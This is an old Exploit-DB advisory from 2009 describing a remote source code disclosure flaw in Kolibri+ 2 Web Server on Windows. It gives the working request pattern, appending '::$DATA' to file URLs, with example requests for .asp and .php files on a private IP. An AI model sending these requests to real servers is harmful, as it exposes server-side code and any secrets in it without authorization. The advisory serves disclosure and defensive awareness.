Kolibri+ Web Server 2 - Arbitrary Source Code Disclosure (2)

EDB-ID:

9650

CVE:

N/A

Author:

Dr_IDE

Type:

remote

Platform:

Windows

Published:

2009-09-11

#################################################################################
#                                                                        	#
# Kolibri+ Web Server 2 Remote Arbitrary Source Code Disclosure 		#
# aka:		More fun with Kolibri+ 2 webserver 		         	#
# Found By:	Dr_IDE								#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Kolibri+ 2 Web Server is a Windows based HTTP server. This is the latest version of
the application available. 

This vulnerability is similar to the one reported earlier by Skull-HacKeR.

Kolibri+ 2 is vulnerable to remote arbitrary source code disclosure
(download in this case) by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# milw0rm.com [2009-09-11]